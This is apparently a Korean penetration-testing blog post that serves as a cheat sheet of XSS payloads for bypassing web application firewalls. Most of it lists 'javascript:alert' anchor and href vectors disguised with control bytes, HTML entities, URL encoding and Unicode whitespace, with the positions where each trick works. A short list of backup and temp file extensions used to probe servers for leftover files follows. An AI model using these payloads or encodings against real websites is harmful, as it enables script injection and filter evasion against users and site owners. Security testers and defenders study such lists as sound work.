모의해킹/┗XSS

XSS WAF Bypass

logthink 2020. 6. 18. 18:07
A태그 WAF Bypass
<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">

[1]
Bytes: 
\x09 \x0a \x0c \x0d \x20 \x2f

<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">

[2,3]
Bytes: 
\x09 \x0a \x0c \x0d \x20

<a href\x20="javascript:alert(1)">
<a href=\x20"javascript:alert(1)">

[4]
Bytes: 
\x01 \x02 \x03 \x04 \x05 \x06 \x07 \x08 \x09 \x0a \x0b \x0c \x0d \x0e \x0f \x10 \x11 \x12 \x13 \x14 \x15 \x16 \x17 \x18 \x19 \x1a \x1b \x1c \x1d \x1e \x1f \x20 

HTML Encoding:
&#x01; &#x02; &#x03; &#x04; &#x05; &#x06; &#x07; &#x08; &#x09; &#x0a; &#x0b; &#x0c; &#x0d; &#x0e; &#x0f; &#x10; &#x11; &#x12; &#x13; &#x14; &#x15; &#x16; &#x17; &#x18; &#x19; &#x1a; &#x1b; &#x1c; &#x1d; &#x1e; &#x1f; &#x20;

<a href="&Tab;javascript:alert(1)">
<a href="&#x001;javascript:alert(1)">

[5]
Bytes: 
\x09 \x0a \x0d

HTML Encoding:
&#x09; &#x0a; &#x0d;

<a href="javas\x09cript:alert(1)">
<a href="javas&Tab;cript:alert(1)">

[6]
Bytes:
\x09 \x0a \x0b \x0c \x0d \x20 \x21 \x2b \x2d \x3b \x7e \xa0 

URL Encode (bytes):
%09 %0a %0b %0c %0d %20 %21 %2b %2d %3b %7e %a0 

HTML Encode (bytes):
&#x09; &#x0a; &#x0b; &#x0c; &#x0d; &#x20; &#x21; &#x2b; &#x2d; &#x3b; &#x7e; &#xa0; 

UTF-8 Symbols:
\u1680 \u2000 \u2001 \u2002 \u2003 \u2004 \u2005 \u2006 \u2007 \u2008 \u2009 \u200a \u2028 \u2029 \u202f \u205f \u3000 \ufeff

URL Encode (UTF-8):
%e1%9a%80 %e2%80%80 %e2%80%81 %e2%80%82 %e2%80%83 %e2%80%84 %e2%80%85 %e2%80%86 %e2%80%87 %e2%80%88 %e2%80%89 %e2%80%8a %e2%80%a8 %e2%80%a9 %e2%80%af %e2%81%9f %e3%80%80 %ef%bb%bf

HTML Encode (UTF-8):
&#x1680; &#x2000; &#x2001; &#x2002; &#x2003; &#x2004; &#x2005; &#x2006; &#x2007; &#x2008; &#x2009; &#x200a; &#x2028; &#x2029; &#x202f; &#x205f; &#x3000; &#xfeff

<a href="javascript:~alert(1)">
<a href="javascript://%0d%0aalert(1)">
<a href="javascript:\x0calert(1)">
<a href="javascript:%ef%bb%bfalert(1)">
<a href="javascript:&#xfeff;alert(1)">


-----------------------------------------
We use char codes to show non printable symbols
\x00 - ASCII hex code
\x20 - SPACE
\x0a - NEW LINE

\u0000 - UTF-8 char code  
\u1680 - OGHAM SPACE MARK 
\u2028 - LINE SEPARATOR

Encoding UTF-8 to URL isn’t obvious:
\u1680 -> %e1%9a%80
\u2028 -> %e2%80%a8


Href태그 WAF Bypass

<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()

<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)
javascript&#x3A;alert()

<!-- alert -->
#HTML entities/encode:
javascript:alert&lpar;&rpar;
javascript:al&#x65;rt``

#url encoding:
javascript:alert%60%60
javascript:x='%27-alert(1)-%27';
javascript:%61%6c%65%72%74%28%29

#JS unicode 
javascript:a\u006Cert``"
javascript:\u0061\u006C\u0065\u0072\u0074``

extensions_temp_backup.txt

.0
.1
.2
.3
.tar
.tgz
.zip
.tar.gz
.rar
.cache
.out
.diff
.old
.temp
.templ
.tmp
.bak
.back
.bak2
.backup
.swo
.%filename%.swo
.swp
.%filename%.swp
.sav
.sv
.save
.un~
.%filename%.un~
~
.~
.~1~
.~2~
.%filename%.~


저작자표시 비영리 변경금지

'모의해킹 > ┗XSS' 카테고리의 다른 글

CSRF 논문문서  (0) 2019.03.22
HTML Entitiy Code List  (0) 2019.03.21
XSS 투어정리  (0) 2019.03.18
tidy up of XSS (작업중)  (0) 2019.03.15

'모의해킹/┗XSS'의 다른글

  • 현재글XSS WAF Bypass

관련글

댓글

티스토리툴바